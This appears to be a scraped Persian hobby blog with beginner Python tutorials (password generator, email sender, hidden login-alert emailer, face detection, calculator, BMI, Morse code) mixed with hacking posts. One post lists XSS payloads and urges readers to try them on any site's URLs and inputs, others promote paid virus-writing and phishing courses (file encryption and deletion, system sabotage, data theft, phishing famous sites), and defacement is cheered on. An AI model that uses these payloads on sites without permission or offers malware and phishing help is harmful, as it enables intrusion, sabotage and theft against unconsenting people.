reshte = input("Toool password => ");reshte = int(reshte)

print (''.join([random.choice
                (
                    'abcdefghijklmnopqrstuvwxyz'
                    +
                    'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
                    +
                    '!@#$%^&*()_+,><;./?`'
                    +
                    '1234567890'
                )
                for i in range(reshte)]))

حالا فایل را کامپایل کنید هر تعداد کاراکتری که میخواید پسوردتون داشته باشه را وارد کنید.

موفق باشید

سلام خدمت کاربران محترم سایت clevers.ir

برای درخواست یکی از شما کاربران عزیز یه چالشی طراحی کردیم که جایزش هم توافقیه.

توضیحات:

یه صفحه ای توی این سایت وجود داره که هم مخفیه و هم رمز داره و رمزش هم با بقیه مطالب متفاوته حالا اگه شما تونستید طبق مراحل زیر پیش برید و توی اون صفحه یه نظر بدید ما به شما یه جایزه خیلیییییییییی خفن میدیم

عکس زیر را دانلود کنید

ما یه متنی را توی عکس زیر پنهان نگاری کردیم شما باید اون متن را پیدا کنید و بقیه مراحل را اجرا کنید.

همه چیز به این عکس برمیگرده.

موفق باشید

سلامی دوباره

اگه پست قبلو مشاهده کرده باشید الان میتونیم یه برنامه امنیتی خفن برای سیستممون بسازیم.

اگه شما هم از اون دسته افرادی باشید که برادر یا خواهر کوچیکتون بی اجازه میرن با سیستمتون کار میکنن یا توی یه شرکتی کار میکنید که همه قصد هک کردن و ورود به سیستم شما را دارن و یا. این آموزش بدردتون میخوره.

مواد لازم:

1. دو تا جیمیل که یکیشون باید مورد تایید گوگل قرار گرفته باشه(طبق این آموزش)
2. کتابخانه pyinstaller برای exe کردن فایل(طبق این آموزش)

• برای راحتی کار جیمیلی که مورد تایید گوگل قرار داره را اسمشو میزاریم فرستنده و جیمیلی که تایید نشده را اسمشو میزاریم گیرنده

سورس زیر را داخل یه اسکریپت پایتون به نام system_starter.py ذخیره کنید:

import smtplib
from datetime import datetime


def sendmail(from_addr,to_addr_list,cc_addr_list,subject,message,login,password,smtpserver="smtp.gmail.com:587"):
     header = "from: %s\n" %from_addr
     header += "to: %s\n"%",".join(to_addr_list)
     header += "cc: %s\n"%",".join(cc_addr_list)
     header += "subject: %s\n\n"% subject
     message = header + message

     server = smtplib.SMTP(smtpserver)
     server.starttls()
     server.login(login,password)
     problems = server.sendmail(from_addr,to_addr_list,message)
     server.quit()
     return problems


time = str(datetime.now())

sendmail(from_addr = "جیمیل فرستنده@gmail.com",
                   to_addr_list = ["جیمیل گیرنده@gmail.com"],
                   cc_addr_list = [""],
                   subject = "system",
                   message = time,
                   login = "جیمیل فرستنده@gmail.com",
                   password = "رمز جیمیل فرستنده")

خب تا اینجا که خوب پیش رفتیم.

حالا مثله این آموزش باید فایلمون را تبدیل به فایل اجرایی کنیم ولی دقت کنید به جای:

pyinstaller --onefile system_starter.py --onefile

باید این دستور را وارد کنید:

pyinstaller --onefile system_starter.py --noconsole

برای اینکه هیچ پنجره ای باز نشه و اون فرد مزاحم متوجه نشه

مرحله آخر:

حالا روی اون علامت ویندوز کنار مانیتور کلیک کنید

روی All Programs کلیک کنید

دنبال پوشه Startup بگردید و روی اون کلیک راست کنید

گزینه Open را انتخاب کنید

برنامه ای را که ساختید را توی پنجره باز شده کپی کنید

و کار تموم میشه

حالااگه کسی وارد سیستم بشه ایمیل فرستنده به ایمیل گیرنده که ایمیل خود شماست پیام میفرسته و زمانی که یکی به سیستم ورود کرده را میگه حالا شما دیگه فقط کافیه جیمیل گیرنده خودتون را چک کنید

یعنی اگه برادر کوچک من وارد سیستم بشه واسه من ایمیل ارسال میشه و زمانش هم اعلام میشه و من میرم مچ برادرم را میگیرم.

ههههههه

موفق باشید

سلام

توی این قسمت میخوایم با هم یه اسکریپتی را با پایتون بنویسیم که ایمیل ارسال کنه و توی 2 تا پست بعد نحوه ساخت برنامه هک جیمیل و ساخت منشی برای سیستم را آموزش بدیم.

پایتون زبان برنامه که هکرها خیلی ازش استفاده میکنن بسیار ساده و فوق العاده قوی هستش ما سعی کردیم مطالب جالبی راجب پایتون بنویسیم

این آموزش یاد میگیریم به وسیله پایتون ایمیل ارسال کنیم آموزش جالبی هستش امیدوارم دوس داشته باشید

خب دوستان عزیز تو این پست قصد داریم از زبان برنامه نویسی پایتون استفاده کنیم و بتونیم ایمیل ارسال کنیم.

قبل از اینکه بخوایم رو نمایی از کده ارسال ایمیل کنیم باید اینو در نطر داشته باشین گوگل محدودیت قرار داده به دلیل

مساعل امنیتی و شما باید اینو بپذیرین که شما از طریق برنامه نویسی بتونین به حساب خودتون لاگین کنید.

برای این کار طبق تصویر زیر به این آدرس روی مرورگر خودتون برید و Allow less secure apps برابر ON کنید:

حالا یه فایل پایتون باز کنید و سورس های زیر را داخلش کپی کنید:

import smtplib


def sendmail(from_addr,to_addr_list,cc_addr_list,subject,message,login,password,smtpserver="smtp.gmail.com:587"):
     header = "from: %s\n" %from_addr
     header += "to: %s\n"%",".join(to_addr_list)
     header += "cc: %s\n"%",".join(cc_addr_list)
     header += "subject: %s\n\n"% subject
     message = header + message

     server = smtplib.SMTP(smtpserver)
     server.starttls()
     server.login(login,password)
     problems = server.sendmail(from_addr,to_addr_list,message)
     server.quit()
     return problems




sendmail(from_addr = "جیمیل خودتون@gmail.com",
                   to_addr_list = ["جیمیلی که میخواید بهش پیام ارسال کنید"],
                   cc_addr_list = ["اگه خواستید به چند تا جیمیل پیام ارسال کنید"],
                   subject = "موضوع",
                   message = "پیام",
                   login = "جیمیل خودتون@gmail.com",
                   password = "رمز جیمیل")

خب حالا موارد بالا را پر کنید و کد هارا کامپایل کنید

اگه مراحل را درست انجام داده باشید جیمیل ارسال میشه.

منتظر 2 مرحله بعدی ما باشید

منشی امنیتی سیستم

موفق باشید

سلام

امروز میخوام درباره بحث جذاب و شیرین تشخیص چهره حرف بزنم تازه اون هم با زبان شیرین پایتون این آموزش یه آموزش خیلی راحته و مثله بعضی سایتا توضیحات بیهوده و الکی ندادمدرضمن تشخیص چهره با پایتون هم همینجا میتونید یادبگیرید و حتی میتونید از روی عکس و فیلم هم تشخیص چهره کنید!!!

با ماهمراه باشید.

مواد لازم:

• مفسر پایتون
• کتابخانه opencv که در ادامه راجبش حرف میزنیم
• کتابخانه numpy که تونم راجبش حرف میزنیم
• فایل های xml چشم و صورت که اونم راجبش حرف میزنیم

من میدونم که همتون پایتون را دارید و اگر هم که ندارید نصف عمرتون به فناست . پس برید پایتون را دانلود و نصب کنید اگه سرچ بکنید نتایج زیادی میبینید

 مرحله 1:

الان باید کتابخونه های opencv و numpy را که خیلی کتابخانه های عجیبی هستن وکاربرد خیلی زیادی دارند را نصب کنید و همونجور که میدونید برای نصب یک کتابخانه روی پایتون بایداز دستور pip در cmd استفاذه کنید:

پس روی کیبورد win + R بگیرید و توی پنجره باز شده cmd را تایپ کنید و اینتر بزنید تا پنجره سیاه cmd باز بشه

حالا داخلش کد زیر را وارد کنید:

pip install numpy --upgrade

و بعد از اینکه numpy را نصب کردید کد زیر را وارد کنید تا opencv نصب بشه:

pip install opencv-python --upgrade

تا اینجا که خوب پیش رفتید

مرحله 2:

حالا نیاز به دو تا فایل xml برای تشخیص چهره داریم که هم میتونید اون هارا از github دانلود کنیم و هم میتونید این فایلی که من اینجا گذاشتم را دانلود کنید که به نظرم گزینه دوم هزار برابر راحت تر از گزینه اوله:

لینک دانلود از گیت هاب: opencv

لینک دانلود دوتا فایل مورد نظر:

دریافت
حجم: 174 کیلوبایت
توضیحات: دوتا فایل مورد نیاز اینجا هستن
 

مرحله 3:

یه فایل پایتون کنار اون دوتا فایل xml درست کنید و کد های زیر را داخلش قرار بدید:

import cv2
import numpy as np

#clevers.ir

face_xml = cv2.CascadeClassifier('face.xml')
eye_xml = cv2.CascadeClassifier('eye.xml')

cap = cv2.VideoCapture(0)

while True:
    _,frame=cap.read()

    gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
    faces = face_xml.detectMultiScale(gray)
    for (x,y,w,h) in faces :
        cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,0),2)
        r_gray=gray[x:x+w,y:y+h]
        r_color= frame[x:x+w,y:y+h]
        eyes=eye_xml.detectMultiScale(r_gray)
        for (ex,ey,ew,eh) in eyes:
            cv2.rectangle(r_color,(ex,ey),(ex+ew,ey+eh),(255,0,0),2)
    cv2.imshow('faceDisplay',frame)
    k = cv2.waitKey(27) & 0xff
    if k==27:
        break
cap.release()
cv2.destroyAllWindows()

اگه به خط نهم دقت کنید یعنی اینجا 

cap = cv2.VideoCapture(0)

اگه توی پرانتز عدد 0 را مثل مثال بالا وارد کنید از طریق وبکم لپ تاپ چهره شما تشخیص داده میشه ولی اگه مثل مثال زیر عکس یا فیلمی را وارد کنید از روی اون عکس یا فیلم تشخیص چهره انجام میشه:

cap = cv2.VideoCapture("اسم فیلم یا عکس.jpg")

دقت کنید که فرمت عکس یا فیلم شما هرچیزی میتونه باشه(jpg,mp4,png,avi,.)پس خودتونو به مثال بالا محدود نکنید و هرچیزی را که دوست دارید قرار بدید.

و بالاخره کار تموم میشه و میتونید برنامه ای که ساختید را تست کنید.

چند نمونه تشخیص چهره که انجام دادم:

بیل گیتس

محمرضا گار

گاندی

جک لندن_نویسنده

پهلوان تختی

همونجور که میبینید این فایل ها یه اشکالات ریزی دارن که قابل برطرف کردن نیستن مثله عکس محمدرضا گار یا تشخیص ندادن چشمان گاندی

نکته:برای خروج از برنامه باید از کلید Esc از کنار کیبورد استفاده کنید

امیدوارم که از این آموزش هم لذت کافی برده باشین.

موفق باشید

سلام توی این پست میخوام شمارو با انواع حملات فیشینگ آشنا بکنم

کلون فیشینگ (clone phishing)

در این نوع فیشینگ، حمله کننده از یک ایمیل معتبر که قبلا ارسال شده است استفاده می‌کند و محتویات ایمیل و آدرسی که در آن است را به ایمیل دیگری که به سایت مخرب لینک شده است تغییر می دهد. سپس حمله کننده مدعی می شود که لینکی که در این ایمیل وجود دارد در واقع لینک جدید یا آپدیت شده لینک قبلی ست و حتی ممکن است بگوید لینک قبلی منقضی شده است و با این کار عمل فیشینگ را انجام می دهد.

اسپیر فیشینگ (spear phishing)

در واقع نوعی حمله است که بر یک فرد یا سازمان شناخته شده تمرکز دارد. حمله اسپیر فیشینگ نسبت به سایر فیشینگ ها پیچیده تر است چون از قبل برنامه ریزی شده است. یعنی حمله کننده در ابتدا و پیش از حمله در مورد قربانی اطلاعاتی جمع آوری می‌کند و سپس بر اساس اطلاعات به دست آمده، پیامی ایجاد می‌کند که کاربر را متقاعد می کند که وبسایت مخرب را مشاهده کند یا یک فایل که مخرب و آلوده است را دانلود نماید.

فارمینگ (pharming)

در فیشینگ فارمینگ حمله کننده DNS را آلوده می‌کند. این موضوع باعث می شود تا کاربران وبسایت های معتبر، به وبسایت هایی که برای ی طراحی شده اند، هدایت شوند. این حمله فیشینگ در واقع خطرناکترین نوع آن است چون سوابق DNS خارج از دسترس کاربر است. بنابراین کاربر در مقابل این حمله کاملا بی دفاع است.

ایمیل اسپوفینگ (Email Spoofing)

در این حمله، حمله کننده ایمیل های ارتباطی شرکت های معتبر یا افراد را جعل می‌کنند. این‌ ایمیل ها ممکن است کاربران ناشناس را به سایت های مخرب بکشانند و از طریق این سایت ها، حمله کنندگان بتوانند اطلاعات حساب کاربران را جمع آوری ‌کنند. این صفحات ممکن است اسکریپت های مخربی مانند تروجان ها، کی لاگرها و سایر اسکریپت های مخرب باشند که توسط آن ها اطلاعات شخصی کاربران به سرقت می رود.

تغییر دهنده های آدرس وبسایت ها (Website Redirects)

این تغییر دهنده ها باعث می شوند تا کاربر به آدرس های متفاوت هدایت شود. حمله کنندگانی از این حملات برای آسیب پذیری استفاده می‌کنند به این صورت که می‌توانند با اجرا کردن این تغییر دهنده ها، بد افزارهایی را روی رایانه کاربران نصب کنند.

والینگ (Whaling)

نوعی از حمله اسپیر فیشینگ است که هدف حمله معمولا افراد ثروتمند و مهم مثل مدیر عاملان یا مسئولان دولتی هستند و دست یابی به اطلاعات شان برای حمله کننده اهمیت زیادی دارد.

تایپو اسکواتینگ (Typosquatting)

تایپو اسکواتینگ که به آن ی برند هم گفته می شود، حجم بازدیدهای وبسایت اصلی را به وبسایت های جعلی هدایت می‌کند. این سایت ها در آدرس شان نام سایت اصلی را با کمی تغییر و با ایجاد چند حرف در املای سایت می آورند. فیشرها از این روش استفاده می کنند تا یک رابط کاربری ایجاد کنند و بازدیدهای سایت معتبر و اصلی را بند. در صورتی که کاربر آدرس سایت اصلی را اشتباه وارد کند، به این سایت ها با آدرس جعلی هدایت می شود و از این راه می توانند اطلاعات کاربران را سرقت کنند.

واترینگ هول (Watering Hole)

در حمله واترینگ هول، فیشر کاربران و سایت های پربازدید را شناسیی می کند و آن ها را زیر نظر می گیرد. سپس با اسکن و‌ بررسی دقیق این سایت ها راهی پیدا می کند که بتواند اسکریپت های مخرب را به سایت ها وارد می‌کند و آن ها را دچار اختلال کند.

برنامه های مخرب (Malicious Applications)

فیشرها می توانند از برنامه های مخرب استفاده کنند تا بدافزارهایی را به سیستم کاربر وارد کنند تا از این راه هم روی سیستم کاربر نظارت داشته باشند و هم اطلاعات حساس او را سرقت کنند. این برنامه ها می‌توانند برنامه هایی برای رصد قیمت ارز دیجیتال ، کیف پول یا سایر ابزارهای مرتبط با کریپتو باشند.

فیشینگ با استفاده از صدا و متن (Text and Voice Phishing)

فیشینگ از راه ارسال پیامک نوعی از فیشینگ است که مبتنی بر پیام متنی است و ویشینگ (vishing) هم مبتنی بر صداست. این روش ها راه هایی هستند که فیشر ها با استفاده از آن ها تلاش می کنند تا اطلاعات شخصی کاربران را تصاحب کنند.

جعل هویت و اهدای جایزه (Impersonation & Giveaways)

یکی دیگر از دام هایی که برای افراد مشهور و ثروتمند چهن می شود، این نوع حمله است. جعل هویت اشخاص مهم و تاثیرگذار در شبکه‌های اجتماعی که اصطلاحا به آن ها اینفلوئنسر گفته می شود. فیشر یا حمله کننده ممکن است هویت افراد مشهور و مهم را جعل کند و با استفاده از آن به جذب مخاطب بپردازد. حتی می تواند تبلیغاتی فریبکارانه به راه بیندازد و ادعا کند که جایزه می دهد. افرادی که قربانی این نوع فریب می شوند، حتی ممکن است از طریق فرآیندها و پردازش های مهندسی اجتماعی، افراد خاصی باشند.

حمله کنندگان از این طریق می توانند حساب های کاربری تایید شده را هک کنند و بعد از تغییر اسم کاربری، از هویت جعلی استفاده کنند در حالی که حساب کاربری آن ها تایید شده هم می‌باشد. به تازگی فیشر ها برای این نوع حملات پلتفرم های خاصی مانند اسلک (Slack)، رد (Discord)  و حتی تلگرام استفاده می کنند.

تبلیغات (Advertisements)

تبلیغات پولی یک راه دیگر برای فیشینگ است. این تبلیغات جعلی از دامنه هایی استفاده می‌کنند که فیشر ها آن ها را تایپو اسکوات کرده و برای بالا رفتن رتبه جستجوی این تبلیغات، هزینه کرده اند. این تبلیغات حتی می تواند به دنبال خدمات یا شرکت های معروفی در حوزه ارز دیجیتال باشد. این سایت ها عموما به عنوان ابزاری برای فیشینگ اطلاعات حساس استفاده می شوند که می تواند اطلاعات مالی را هم شامل شود.

منبع: binance

سلام

یه سورس حرفه ای ماشین حساب گرافیکی پایتون پیدا کردم و یکمی اصلاحش کردم تا این شد:

حالا کد های زیر را داخل یه فایل پایتون ذخیره و اجرا کنید:

from tkinter import*


#clevers.ir
def fCalc(src, side):
    appObj = Frame(src, borderwidth=4, bd=2,bg = "#cccccc")
    appObj.pack(side=side, expand=YES, fill=BOTH)
    return appObj

def button(src, side, text, command=None):
    appObj = Button(src, text=text, command=command)
    appObj.pack(side=side, expand=YES, fill=BOTH)
    return appObj

class app(Frame):
    def __init__(self, root = Tk(), width=364, height=425):
        Frame.__init__(self)
        self.option_add("*Font", 'arial 20 bold')
        self.pack(expand=YES, fill=BOTH)
        self.master.title("Clevers.ir Calculator")
        screen_width = root.winfo_screenwidth()
        screen_height = root.winfo_screenheight()
        x = (screen_width/2) - (width/2)
        y = (screen_height/2) - (height/2)
        root.geometry('%dx%d+%d+%d' % (width, height, x, y))
        display = StringVar()
        Entry(self, relief= RIDGE,      
                    textvariable=display, state=DISABLED, justify='right', bd=20, bg="silver").pack(side=TOP, expand=YES,
                            fill=BOTH)
        clrChar = "Clear"
        button(self, TOP, clrChar, lambda appObj=display, i=clrChar: appObj.set(''))


        for btnNum in ("789/", "456*", "123-", "0.+"):

            FunctionNum = fCalc(self, TOP)
            for fEquals in btnNum:
                button(FunctionNum, LEFT, fEquals,
                        lambda appObj=display, i=fEquals: appObj.set(appObj.get() + i))
                EqualsButton = fCalc(self, TOP)
                
        for fEquals in "=":
            if fEquals == "=":
                btnEquals = button(EqualsButton, LEFT, fEquals)
                btnEquals.bind('<ButtonRelease-1>',
                                lambda e, s=self, appObj=display: s.result(appObj), "+")
            else:
                btnEquals = button(EqualsButton, LEFT, fEquals,
                        lambda appObj=display, s=" %s "%fEquals: appObj.set(appObj.get()+s))

    def result(self, display):
        try:
            display.set(eval(display.get()))
        except:
            display.set("UNDEFINED")

if __name__ == '__main__':
    app().mainloop()

امیدوارم خوشتون اومده باشه.

موفق باشید.

سلام

توی این قسمت میخوایم با هم برنامه محاسبه توده بدنی یا همون bmi را بسازیم یا ختی اگه نمیتونید بسازید من خودم اون برنامه را ساختم و میتونید از روی پایین همین پست دانلود کنید.

خب اول از همه باید بدونیم توده بدنی چی هست؟؟؟ توده بدنی یک محاسبه سادست که به شما نشون میده اضافه وزن دارید یا چاقی یا لاغری یا.

فرمول محاسبه توده بدنی:

توده بدنی = قد²/وزن

BMI = weight/Height²

قد باید بر حسب متر و وزن باید برحسب کیلوگرم باشه

طبق استاندارد جهانی این عددی که بدست میارید اگه بین x و y بود شما چاقید و. که در عکس پایین میتونید ببینید اطلاعات خودتون را بسنجید و ببینید چاقید یا لاغر.

حالا ما میخوایم به کمک پایتون یه برنامه ای بنویسیم که بصورت خودکار bmi ما را حساب کنه و بگه چاقیم یا لاغر.

یه فایل پایتون بازکنید و کد های زیر را ذاخلش کپی کنید:

from tkinter import *
from tkinter import messagebox

#clevers.ir
def bmi():
    try:
        g = float(ghad.get())
        v = float(vazn.get())
    except:
        messagebox.showerror("خطا", "لطفا مقادیر خواسته شده را درست وارد کنید")
    try:
        n = v/(g*g)
        if n<18.5:
            messagebox.showinfo("کمبود وزن",(n,"شما دچار کمبود وزن هستید با تنظیم رژیم غذایی و ورزش به وزن ایده عال برسید."))
        elif 18.5<n<24.9:
            messagebox.showinfo("وزن طبیعی",(n,"تبریک میگوییم وزن شما ایده عال است"))
        elif 25<n<29.9:
            messagebox.showinfo("اضافه وزن",(n,"شما دارای اضافه وزن هستید وزن خود را کم کنید و توده بدنی خود را به 24 برسانید"))
        elif 30<n<34.9:
            messagebox.showinfo("چاق",(n,"شما دارای چاقی هستید وزن خود را به حد مناسب برسانید"))
        elif 35<n:
            messagebox.showinfo("خیلی چاق",(n,"شما خیلی چاق هستسد این چاقی میتواند بسیار خطرناک باشد وزن خود را بسیار کاهش دهید"))
    except:
        messagebox.showerror("خطا", "لطفا مقادیر خواسته شده را درست وارد کنید")

#window
#clevers.ir
window = Tk()
window.minsize(350,220)
window.resizable(width=False, height=False)
window.title("bmi")

#labelframe
lf = LabelFrame(window, text="مشخصات")
lf.pack(fill="both",expand="yes")

#ghad
Label(lf,text=":قد\n(بر حسب متر)").pack()
ghad=Entry(lf,width=45)
ghad.pack()

#fasele
Label(lf).pack()

#vazn
Label(lf,text=":وزن\n(برحسب کیلوگرم)").pack()
vazn=Entry(lf,width=45)
vazn.pack()

#fasele
Label(lf).pack()

#mohasebe
Button(lf,text="محاسبه کن",command=bmi).pack()
#clevers.ir

window.mainloop()

و برنامه ما ساخته میشه و فقط کافیه اونو اجرا کنید.

تصاویری از برنامه:

​​​​​​

فک کنم دیگه همه چیز را گفتم.

دانلود برنامه:

دریافت
حجم: 7.86 مگابایت

نظر فراموش نشه.

سلام

توی این پست میخوام بهترین payload های حملات xss را براتون قرار بدم و شما هم میتونید از اونا توی url یا input یا. هر سایتی استفاده کنین و آسیب پذیری اون سایت را تشخیص بدید.

نمونه ای از payload ها:

.
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
.

دانلود فایل:

دریافت
حجم: 19.8 کیلوبایت
 

رمز فایل: clevers.ir

بزودی روش ساخت اسکنر این نوع باگ را هم آموزش میدم

نظر فراموش نشه.

سلام

بنا به درخواست مکرر شما تصمیم گرفتم یه دوره ویروس نویسی به زبان ساده (با cmd) و بعدا پیشرفته (با زبان پایتون) قرار بدم طی این دوره ما موارد زیر را یاد میگیریم:

• دستورات cmd
• تغییر فرمت فایل ها
• بچ نویسی
• اجرا پی در پی دستور
• رمزنگاری فایل ها
• حذف فایل ها
• از کار انداختن سیستم
• تخریب cpu
• ساخت لینک مخرب
• سرقت اطلاعات
• .

این دوره هیچ پیش نیاز خاصی نداره و فقط و فقط شما به یه سیستم ویندوز نیاز دارید. قبل از شروع دوره بهتره که کمی با cmd آشنا بشید(برای آشنایی با cmd کلیک کنید)

کل آموزش های این دوره رمز گذاری شدن و برای دریافت رمز اینجا را کلیک کنید.

امیدوارم از این دوره خوشتون بیاد. و نهایت لذت را ببرید.

منبع: erfanwd.blog.ir

سلام

همین امروز یه ایده عجیب ولی خیلییییییییییی باحال به ذهنم رسید و طی 1 ساعت ایدمو عملی کردم و یه برنامه ساختم یه برنامه خیلی خیلی خیلی خیلی خیلی خیلی خیلی جالب و باحال و عجیب!!!.

اسم این برنامه را گذاشتم همه چیز دان

این برنامه هر سوالی ازش بپرسی جواب میده(ولی سوالتون باید دارای آیا باشه)

سوالات دارای آیا:

آیا برم سرکار؟ ==> برم سرکار؟ (آیا حذف شده باشه هم ایرادی نداره)

برم بخوابم؟

یه پست جدید منتشر کنم؟

.

از امروز دیگه این برنامه را رفیق و همدم خودتون بدونید و هرجایی که شک و تردید داشتید از همه چیزدان بپرسید.

تصاویری از محیط برنامه:

دیگه نکته ای نمونده و دیگه رسیده وقت دانلود.

دانلود برنامه:

دریافت
حجم: 7.82 مگابایت
 

نظر یادتون نره.

سلام

یه کد جالب و باحالی نوشتم که متن را تبدیل میکنه به الفبای مورس و حتی اون الفبا را با صدای بوق میخونه! این کد هارا داخل یه فایل پایتون کپی و اجرا کنید:

import winsound
import time
#clevers.ir
frequency = 1000
MorseCode={"a":".-","b":"-.","c":"-.-.","d":"-","e":".","f":"-.",
           "g":"--.","h":"","i":"","j":".---","k":"-.-","l":".-",
           "m":"--","n":"-.","o":"---","p":".--.","q":"--.-","r":".-.",
           "s":".","t":"-","u":"-","v":".-","w":".--","x":"--",
           "y":"-.--","z":"--"," ":" "}
while(True):
	Text = input("Enter your Text: ")
	Text = Text.lower()
	Coded_Text = ''

	for c in Text:
		Coded_Text = Coded_Text + " " + MorseCode[c]
		
	print(Coded_Text)

	for s in Coded_Text:
		if s == ".":
			winsound.Beep(frequency, 100)
		elif s == "-":
			winsound.Beep(frequency, 300)
		else:
			time.sleep(.5)
		time.sleep(.1)
#clevers.ir

مثلا welcome to clevers site را تبدیل میکنه به:

.-- . .- -.-. --- -- .   - ---   -.-. .- . .- . .-. .   .  - .

نظر فراموش نشه.

اگه ایده ای داشتید حتما بگید

این متن دومین مطلب آزمایشی من است که به زودی آن را حذف خواهم کرد.

زکات علم، نشر آن است. هر وبلاگ می تواند پایگاهی برای نشر علم و دانش باشد. بهره برداری علمی از وبلاگ ها نقش بسزایی در تولید محتوای مفید فارسی در اینترنت خواهد داشت. انتشار جزوات و متون درسی، یافته های تحقیقی و مقالات علمی از جمله کاربردهای علمی قابل تصور برای ,بلاگ ها است.

همچنین وبلاگ نویسی یکی از موثرترین شیوه های نوین اطلاع رسانی است و در جهان کم نیستند وبلاگ هایی که با رسانه های رسمی خبری رقابت می کنند. در بعد کسب و کار نیز، روز به روز بر تعداد شرکت هایی که اطلاع رسانی محصولات، خدمات و رویدادهای خود را از طریق بلاگ انجام می دهند افزوده می شود.

این متن اولین مطلب آزمایشی من است که به زودی آن را حذف خواهم کرد.

مرد خردمند هنر پیشه را، عمر دو بایست در این روزگار، تا به یکی تجربه اندوختن، با دگری تجربه بردن به کار!

اگر همه ما تجربیات مفید خود را در اختیار دیگران قرار دهیم همه خواهند توانست با انتخاب ها و تصمیم های درست تر، استفاده بهتری از وقت و عمر خود داشته باشند.

همچنین گاهی هدف از نوشتن ترویج نظرات و دیدگاه های شخصی نویسنده یا ابراز احساسات و عواطف اوست. برخی هم انتشار نظرات خود را فرصتی برای نقد و ارزیابی آن می دانند. البته بدیهی است کسانی که دیدگاه های خود را در قالب هنر بیان می کنند، تاثیر بیشتری بر محیط پیرامون خود می گذارند.

سلام خدمت شما معتادان اینستاگرام!

طبق قولی که داده بودم قرار شد از مراحل ساخت ربات اینستاگرام فیلم بگیرم و پست کنم،تا الان پیش نمایشش را منتشر کرده بودم ولی الان نسخه 1.0 که ساده ترین حالت ممکنه را منتشر کردم ولی بزودی قابلیت های جدیدی اضافه میشه

فعلا فقط لوگین میکنه و از روی یه هشتگ فالو و لایک میکنه

نظر فراموش نشه.

سلام سلام مثه همیشه با یه آموزش خفن همراهتون هستم توی این آموزش قراراه بهتون یاد بدم که دیفیس چیه و چطور میشه اونو ساخت؟؟

دیفیس تشریه که یه هکر به سایت میزنه یعنی وقتی سایتی را هک کرد صفحه اول سایت را یه نوشته خفن با یه عکس خفن میزاره.و شما میتونید از قسمت زیر دیفیس مورد نظرتونو بسازید و لذت ببرید:

عبارت زیر را توی گوگل سرچ کنین تا گراف قلبی را ببینید و این معادله را برای دوستاتون بفرستین

sqrt(cos(x))*cos(300x)+sqrt(abs(x))-0.7)*(4-x*x)^0.01, sqrt(6-x^2), -sqrt(6-x^2) from -4.5 to 4.5

اولین بار یه دانشجوی چینی این معادله را مینویسه و به دختری که بهش علاقه داشته میده.

زندگیتون پر از عشق

سلام خدمت شما کاربران مشتاق یادگیری.

بنا به درخواست یکی از کاربران تصمیم گرفتم یه دوره آموزشی فیشینگ بزارم از ویژگی های این دوره:

• هاست و دامین رایگان برای فیشینگ(خیلی مهم)
• فیشینگ هر تعداد سایت با یک دامنه
• فیشینگ سایت های معروف
• بدست آوردن آی پی کاربران
• روش های حرفه ای مهندسی اجتماعی
• عدم نیاز به دانش برنامه نویسی
• .

لازم به ذکره که تمامی آموزش های این دوره رمز گذاری شدن و برای دریافت رمز اینجا را کلیک کنید.قبلا از شروع این دوره بهتره با حملات فیشینگ آشنایی لازم را پیدا کنید(اینجا را کلیک کنید)

به دوره ویروس نویسی ما هم یه سر بزنید

 موفق باشید

سلام یه رباتی برای اینستاگرام دارم میسازم که به صورت خودکار فالو و لایک میکنه و شاید بزودی ارسال کامنت را هم براش گذاشتم.

روش کار کلی ربات های اینستاگرام:

دیدید بعضی وقتا وقتی که یکی را فالو میکنید اونم فالو بک میده یعنی شما را به صورت متقابل فالو میکنه. معمولا از هر 10 نفر که شانسی فالو کنید حداقل یکیشون شما را فالو میکنن و ربات اینستاگرام میاد 10000 نفر را فالو میکنه و وقتی که 1000 تاشون فالو بک دادن اونوقت همه 10000 نفر را آنفالو میکنه! الان مطمئنم که همتون تعجب کردید.

آره ربات اینستاگرام یه ت پیچیده داره!

اینم فیلم رباتی که من تا اینجای کار ساختم: